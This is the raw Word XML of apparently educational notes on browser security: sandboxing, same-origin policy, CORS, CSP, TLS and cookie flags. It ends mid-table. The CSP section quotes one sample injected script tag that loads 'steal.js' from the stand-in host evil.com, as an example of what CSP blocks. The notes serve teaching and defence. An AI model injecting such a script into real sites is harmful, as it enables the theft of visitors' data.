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C140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BROWSER SECURITY (CLIENT-SIDE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B02B6C7" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:r w:rsidRPr="00497451">
        <w:t xml:space="preserve">The browser is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00497451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">first line of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00497451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00497451">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00497451">
        <w:br/>
        <w:t>Its main goals are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022AB3F5" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Protect the user’s system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B46724E" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Prevent one website from stealing data from another</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189BEBF0" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Block malicious code execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B304DC" w14:textId="582D3CDA" w:rsidR="00091BDA" w:rsidRDefault="00497451">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64AF7E35" wp14:editId="79239CBD">
            <wp:extent cx="2082800" cy="3146729"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="78674928" name="Picture 2" descr="javascript - Same origin policy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script - Same origin policy - Stack Overflo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536" cy="319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C9233E" wp14:editId="792510A6">
            <wp:extent cx="3459480" cy="3459480"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="1947241238" name="Picture 1" descr="What Is Sandboxing? Working, and Best Practices for 2022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Sandboxing? Working, and Best Practices for 2022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EB87C" w14:textId="77777777" w:rsidR="00497451" w:rsidRDefault="00497451"/>
    <w:p w14:paraId="181E37C8" w14:textId="77777777" w:rsidR="00497451" w:rsidRDefault="00497451"/>
    <w:p w14:paraId="26BB5640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1. Security Sandbox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE8989B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What It Is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25337DD4" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:r w:rsidRPr="00497451">
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00497451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sandbox</w:t>
      </w:r>
      <w:r w:rsidRPr="00497451">
        <w:t xml:space="preserve"> is an isolated environment where browser code runs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436EE9E2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How It Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110F61F7" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t xml:space="preserve">JavaScript and web content run </w:t>
      </w:r>
      <w:r w:rsidRPr="00497451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>inside the browser only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162DF290" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>No direct access to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBF29C5" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB251E4" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>OS memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FC8440" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Installed applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406A5ECC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Why It Matters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC37FE4" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:r w:rsidRPr="00497451">
        <w:t>Even if a website is malicious:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260E281E" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">It </w:t>
      </w:r>
      <w:r w:rsidRPr="00497451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cannot install malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0825DC05" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t xml:space="preserve">It </w:t>
      </w:r>
      <w:r w:rsidRPr="00497451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cannot read your local files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F766C7B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Real-World Threat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2C7B27" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sandbox Escape</w:t>
      </w:r>
      <w:r w:rsidRPr="00497451">
        <w:br/>
        <w:t>Attackers exploit browser engine bugs to break isolation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7D8A84" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00497451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1137D3D4" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t xml:space="preserve">Keep browsers </w:t>
      </w:r>
      <w:r w:rsidRPr="00497451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>auto-updated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C638BE" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Avoid outdated or unsupported browsers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407BAADD" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:r w:rsidRPr="00497451">
        <w:pict w14:anchorId="02B3E99E">
          <v:rect id="_x0000_i1041" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6356B1F5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2. Same-Origin Policy (SOP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF5DD66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What Is an Origin?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663B39EA" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:r w:rsidRPr="00497451">
        <w:t>An origin =</w:t>
      </w:r>
      <w:r w:rsidRPr="00497451">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00497451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Protocol + Domain + Port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0929B821" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:r w:rsidRPr="00497451">
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20896F9B" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:r w:rsidRPr="00497451">
        <w:t>https://bank.com:443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538B47D4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How SOP Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214F6489" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Scripts from attacker.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD0B169" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cannot read data</w:t>
      </w:r>
      <w:r w:rsidRPr="00497451">
        <w:t xml:space="preserve"> from bank.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A32FA96" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:r w:rsidRPr="00497451">
        <w:t>Even if both are open in different tabs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C426A2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Attack Prevented</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200ADC09" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Cross-site data theft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA80E2C" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Session stealing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5934A412" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Unauthorized API reads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53872A91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Common Bypass (Misconfiguration)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0378E953" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t xml:space="preserve">Bad </w:t>
      </w:r>
      <w:r w:rsidRPr="00497451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CORS</w:t>
      </w:r>
      <w:r w:rsidRPr="00497451">
        <w:t xml:space="preserve"> settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509BD72A" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Access-Control-Allow-Origin: * on sensitive APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059A4113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Secure Practice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BF2F14" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t xml:space="preserve">Allow </w:t>
      </w:r>
      <w:r w:rsidRPr="00497451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>specific trusted domains only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067DB616" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Never allow wildcard origins for authenticated APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBF16BA" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:r w:rsidRPr="00497451">
        <w:pict w14:anchorId="4B16049A">
          <v:rect id="_x0000_i1042" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D7A1E9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3. Content Security Policy (CSP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6B0DEE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What CSP Does</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05025CB3" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:r w:rsidRPr="00497451">
        <w:lastRenderedPageBreak/>
        <w:t>CSP tells the browser:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AAF9FF" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:r w:rsidRPr="00497451">
        <w:t>“Load scripts, images, and styles ONLY from trusted sources.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2845839B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Why CSP Is Powerful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD68E3B" w14:textId="44CC0848" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:r>
        <w:t xml:space="preserve">It </w:t>
      </w:r>
      <w:r w:rsidRPr="00497451">
        <w:t>Stops:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1B1465" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Cross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EA51EA" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Inline script injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30555527" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Third-party malicious scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B07629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Example Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D39B0D6" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:r w:rsidRPr="00497451">
        <w:t>Injected code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4941BA9D" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:r w:rsidRPr="00497451">
        <w:t xml:space="preserve">&lt;script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00497451">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00497451">
        <w:t>="evil.com/steal.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A0EDB3" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:r w:rsidRPr="00497451">
        <w:t xml:space="preserve">If CSP is strict → </w:t>
      </w:r>
      <w:r w:rsidRPr="00497451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Browser blocks it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCBF5F9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Secure CSP Rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A8145F" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Disable unsafe-inline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F223BDB" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Allow scripts only from your domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5F1501" w14:textId="77777777" w:rsidR="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Use nonces or hashes for scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158B1674" w14:textId="77777777" w:rsidR="00497451" w:rsidRDefault="00497451" w:rsidP="00497451"/>
    <w:p w14:paraId="71181541" w14:textId="3CC1BC3E" w:rsidR="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. HTTPS and TLS Encryption</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8BA444" w14:textId="6CE8B59C" w:rsidR="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7320FE7A" wp14:editId="5C3F6DC6">
            <wp:extent cx="5731510" cy="3274060"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="808547471" name="Picture 3" descr="What happens in a TLS handshake? | SSL handshake | Cloudfl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What happens in a TLS handshake? | SSL handshake | Cloudflar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E064" w14:textId="77777777" w:rsidR="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AA1CDD3" w14:textId="43B529C3" w:rsidR="00497451" w:rsidRDefault="00497451" w:rsidP="0049745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9B8BF32" wp14:editId="097E0C93">
            <wp:extent cx="5715000" cy="5715000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="648979527" name="Picture 4" descr="SSL/TLS Handshake: Ensuring Secure Online Interactions - SSL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SL/TLS Handshake: Ensuring Secure Online Interactions - SSL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6DCFB" w14:textId="77777777" w:rsidR="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E548461" w14:textId="77777777" w:rsidR="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="762FDA92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5. Cookie Security Controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E1072E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What Cookies Store</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DD382A" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Session tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC095E6" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Login state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73436EF2" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Preferences</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D04244F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Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F1E835" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>XSS stealing cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3565F652" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Packet sniffing on HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A7830E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Secure Cookie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1482"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497451" w:rsidRPr="00497451" w14:paraId="08157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B6CB3" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00497451">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A660D36" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00497451">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497451" w:rsidRPr="00497451" w14:paraId="07B0C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E627" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00497451">
              <w:t>HttpOnly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62A47" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
            <w:r w:rsidRPr="00497451">
              <w:t>Blocks JS access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497451" w:rsidRPr="00497451" w14:paraId="58DB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5427" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
            <w:r w:rsidRPr="00497451">
              <w:t>Secure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EA130D7" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
            <w:r w:rsidRPr="00497451">
              <w:t>HTTPS only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497451" w:rsidRPr="00497451" w14:paraId="16922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E3FC" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00497451">
              <w:t>SameSite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93BA6" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
            <w:r w:rsidRPr="00497451">
              <w:t>Prevents CSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497451" w:rsidRPr="00497451" w14:paraId="5E782444" w14:textId="77777777">
